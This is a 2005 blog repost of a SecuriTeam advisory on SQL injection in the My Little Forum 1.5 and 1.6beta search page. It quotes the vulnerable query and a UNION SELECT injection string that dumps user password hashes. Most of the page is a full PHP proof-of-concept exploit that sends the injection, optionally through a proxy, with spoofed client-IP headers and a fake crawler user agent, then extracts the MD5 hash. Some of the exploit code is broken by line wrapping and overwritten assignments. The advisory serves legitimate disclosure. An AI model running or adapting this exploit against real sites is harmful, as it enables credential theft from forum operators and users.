Search This Blog

Monday, September 26, 2005

[UNIX] My Little Forum SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

My Little Forum SQL Injection
------------------------------------------------------------------------

SUMMARY

<http://www.mylittlehomepage.net/my_little_forum> my little forum - "A
simple web-forum that supports classical thread view (message tree) as
well as message board view to display the messages."

My Little Forum vulnerable to SQL Injection.

DETAILS

Vulnerable Systems:
* my little forum versions 1.5 and 1.6beta

Vulnerable Code:
From line 144 of search.php:
..
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR,
'".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM
".$forum_table."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
$settings['search_results_per_page'], $connid);
..

Now goto the search page, select "phrase", and type:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM
forum_userdata where user_name='[username]' /*

If magic quotes are off you will have any admin/user password hash 'cause
$searchstring var is not filtered.

Exploit:
<?php
# mlfexpl.php
#
#
#
# My Little Forum 1.5 ( possibly prior versions) SQL Injection /
#
# MD5 password hash disclosure poc exploit with proxy support
#
#
#
# by rgod
#
# site: http://rgod.altervista.org
#
#
#
# make these changes in php.ini if you have troubles
#
# to launch this script:
#
# allow_call_time_pass_reference = on
#
# register_globals = on
#
#
#
# usage: launch this script from Apache, fill requested fields, then...
#
# dump all password hashes from database right now...
#
#
#
# Sun-Tzu: "You can be sure of succeeding in your attacks if you only
attack #
# places which are undefended. You can ensure the safety of your defense
if #
# you only hold positions that cannot be attacked."
#

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta
http-equiv="Co
ntent-Type" content="text/html; charset=iso-8859-1"><style
type="text/css"><!--
body,td,th { color: #00FF00;} body { background-color: #000000;}
Stile5 {
font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px;}
Stile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold;
font-sty
le: italic; } --> </style></head> <body> <p class="Stile6"> My Little
Forum 1
5 SQL Injection </p><p class="Stile6">a script by rgod at <a href="http:
//rgod
altervista.org" target="_blank" > http://rgod.altervista.org </a>
</p><table
width="84%"><tr><td width="43%"> <form name="form1" method="post"
action="'
$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value
"><p><input type="text" name="host"><span class="Stile5">hostname (ex:
www.siten
ame.com) </span></p><p><input type="text" name="path"> <span
class="Stile5">
path (ex: /mylf/ or just /) </span></p><p><input type="text" name="port"
><span
class="Stile5"> specify a port other than 80 (default
value)</span></p><p><input
type="text" name="proxy"> <span class="Stile5"> send exploit through an
HTTP
proxy (ip:port) </span> </p> <p> <input type="text" name="username"> <span
class
-"Stile5">username whom you want MD5 hash </span> </p> <p> <input
type="submit"
name="Submit" value="go!"></p></form></td></tr></table></body>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
 }
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
 }
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet,$show)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
 die;
 }
}
fputs($ock,$packet);
if ($proxy=='')
{

$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
if ($port=='') {$port=80;}

$sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
$sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line
$sql=" FROM forum_userdata WHERE user_name='".$username."'/*";
$sql=urlencode($sql);

if ($proxy=='')
{$packet="GET ".$path."search.php?search=".$sql."&ao=phrase
HTTP/1.1\r\n";}
else
{$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase
HTTP/1.1\r\n";}
$packet.="Client-IP: 127.0.0.1\r\n";
$packet.="X-Forwarded-For: 127.0.0.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.$path."search.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent:
Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet,0);
$temp=explode(';<span class="category">(',$html);
$temp2=explode(')</span>',$temp[1]);
$hash=$temp2[0];

echo '<br>username: '.$username.' hash: '.$hash;
# debugging...
//echo htmlentities($html);
}
else
{
echo '<br>fill in all requested fields, optionally specify a
proxy...<br>';
}
?>

Version 1.6beta is vulnerable too:
..
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL
".$time_difference." HOUR) AS
Uhrzeit, subject, name, email, hp, place, text, category FROM
".$db_settings['forum_table']."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.",
".$settings['search_results_per_page'],
$connid);
..

You will have same results, deleting a statement in injection string:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata
where user_name='[username]' /*

ADDITIONAL INFORMATION

The information has been provided by <mailto:retrogod@aliceposta it>
rgod.
The original article can be found at:
<http://rgod.altervista.org/mylittle15_16b.html>
http://rgod.altervista.org/mylittle15_16b.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)